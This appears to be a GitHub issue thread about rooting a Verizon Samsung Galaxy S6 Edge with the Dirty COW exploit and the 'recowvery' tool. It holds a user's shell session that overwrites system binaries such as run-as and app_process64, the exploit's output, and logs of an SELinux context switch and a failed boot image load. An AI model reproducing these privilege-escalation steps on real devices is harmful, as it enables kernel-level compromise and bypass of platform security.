jcadduono
commented
7 years ago you need to edit the recowvery-applypatch.c file with the actual path to the boot image, since samsung doesn't set up the symlink for bootdevice properly, not sure what the actual path is, you can check fstab or the install-recovery.sh script if it's readable. you also need to edit the rc injection in there as well (samsung doesnt have an init.fm.whatever) in any case, theres no use in doing so as this device does not have an unlocked bootloader.
ghost
Device: Samsung Galaxy S6 Edge Verizon (sm-g925v) Android 6.0.1
`shell@zeroltevzw:/data/local/tmp $ ls dirtycow recowvery-app_process64 recowvery-applypatch recowvery-run-as shell@zeroltevzw:/data/local/tmp $ chmod +x * shell@zeroltevzw:/data/local/tmp $ clear
/dirtycow /system/bin/applypatch recowvery-applypatch < warning: new file size (18472) and file old size (82912) differ
size 82912
[] mmap 0x7f906a0000 [] exploit (patch) [] currently 0x7f906a0000=10102464c457f [] madvise = 0x7f906a0000 82912 [*] madvise = 0 1048576 ^C /dirtycow /system/bin/applypatch recowvery-applypatch < warning: new file size (18472) and file old size (82912) differ
size 82912
[] mmap 0x7f7a98e000 [] exploit (patch) [] currently 0x7f7a98e000=10102464c457f [] madvise = 0x7f7a98e000 82912 [] madvise = 0 1048576 [] /proc/self/mem 1040187392 1048576 [*] exploited 0x7f7a98e000=10102464c457f /dirtycow /system/bin/app_process64 recowvery-app_process64 < warning: new file size (10200) and file old size (22456) differ
size 22456
[] mmap 0x7f8af9b000 [] exploit (patch) [] currently 0x7f8af9b000=10102464c457f [] madvise = 0x7f8af9b000 22456 [] madvise = 0 1048576 [] /proc/self/mem 2071986176 1048576 [*] exploited 0x7f8af9b000=10102464c457f /dirtycow /system/bin/run-as recowvery-run-as < warning: new file size (10192) and file old size (14192) differ
size 14192
[] mmap 0x7f9ce3c000 [] exploit (patch) [] currently 0x7f9ce3c000=10102464c457f [] madvise = 0x7f9ce3c000 14192 [] madvise = 0 1048576 [] /proc/self/mem 1996488704 1048576 [*] exploited 0x7f9ce3c000=10102464c457f shell@zeroltevzw:/data/local/tmp $ run-as su Welcome to recowvery! (run-as)
Current uid: 2000 Setting capabilities Could not set capabilities Error 1: Operation not permitted
logcat:--------- beginning of main --------- beginning of system 01-22 17:20:12.041 18374 18374 I recowvery: Welcome to recowvery! (app_process64) 01-22 17:20:12.041 18374 18374 I recowvery: ------------ 01-22 17:20:12.041 18374 18374 I recowvery: Current selinux context: u:r:zygote:s0 01-22 17:20:12.041 18374 18374 I recowvery: Set context to 'u:r:system_server:s0' 01-22 17:20:12.051 18374 18374 I recowvery: Current security context: u:r:system_server:s0 01-22 17:20:12.051 18374 18374 I recowvery: Setting property 'ctl.start' to 'flash_recovery' 01-22 17:20:12.051 18374 18374 I recowvery: ------------ 01-22 17:20:12.051 18374 18374 I recowvery: Recovery flash script should have started! 01-22 17:20:12.051 18374 18374 I recowvery: Run on your PC or device to see progress: adb logcat -s recowvery 01-22 17:20:12.051 18374 18374 I recowvery: Waiting 3 minutes to try again (in case it didn't start or you forgot to dirtycow applypatch first)... 01-22 17:20:12.101 18380 18380 I recowvery: Welcome to recowvery! (applypatch) 01-22 17:20:12.101 18380 18380 I recowvery: ------------ 01-22 17:20:12.101 18380 18380 I recowvery: Loading boot image from block device '/dev/block/bootdevice/by-name/boot'... 01-22 17:20:12.101 18380 18380 E recowvery: Failed to load boot image! 01-22 17:20:12.101 18380 18380 E recowvery: Error 22: Invalid argument 01-22 17:20:12.101 18380 18380 E recowvery: Exiting... 01-22 17:20:12.111 18383 18383 I recowvery: Welcome to recowvery! (applypatch) 01-22 17:20:12.111 18383 18383 I recowvery: ------------ 01-22 17:20:12.111 18383 18383 I recowvery: Loading boot image from block device '/dev/block/bootdevice/by-name/boot'... 01-22 17:20:12.111 18383 18383 E recowvery: Failed to load boot image! 01-22 17:20:12.111 18383 18383 E recowvery: Error 22: Invalid argument 01-22 17:20:12.111 18383 18383 E recowvery: Exiting... 01-22 17:23:12.091 18870 18870 I recowvery: Welcome to recowvery! (app_process64) 01-22 17:23:12.091 18870 18870 I recowvery: ------------ 01-22 17:23:12.091 18870 18870 I recowvery: Current selinux context: u:r:zygote:s0 01-22 17:23:12.091 18870 18870 I recowvery: Set context to 'u:r:system_server:s0' 01-22 17:23:12.091 18870 18870 I recowvery: Current security context: u:r:system_server:s0 01-22 17:23:12.091 18870 18870 I recowvery: Setting property 'ctl.start' to 'flash_recovery' 01-22 17:23:12.101 18870 18870 I recowvery: ------------ 01-22 17:23:12.101 18870 18870 I recowvery: Recovery flash script should have started! 01-22 17:23:12.101 18870 18870 I recowvery: Run on your PC or device to see progress: adb logcat -s recowvery 01-22 17:23:12.101 18870 18870 I recowvery: Waiting 3 minutes to try again (in case it didn't start or you forgot to dirtycow applypatch first)... 01-22 17:23:12.131 18876 18876 I recowvery: Welcome to recowvery! (applypatch) 01-22 17:23:12.131 18876 18876 I recowvery: ------------ 01-22 17:23:12.131 18876 18876 I recowvery: Loading boot image from block device '/dev/block/bootdevice/by-name/boot'... 01-22 17:23:12.131 18876 18876 E recowvery: Failed to load boot image! 01-22 17:23:12.131 18876 18876 E recowvery: Error 22: Invalid argument 01-22 17:23:12.131 18876 18876 E recowvery: Exiting... 01-22 17:23:12.141 18877 18877 I recowvery: Welcome to recowvery! (applypatch) 01-22 17:23:12.141 18877 18877 I recowvery: ------------ 01-22 17:23:12.141 18877 18877 I recowvery: Loading boot image from block device '/dev/block/bootdevice/by-name/boot'... 01-22 17:23:12.141 18877 18877 E recowvery: Failed to load boot image! 01-22 17:23:12.141 18877 18877 E recowvery: Error 22: Invalid argument 01-22 17:23:12.141 18877 18877 E recowvery: Exiting...`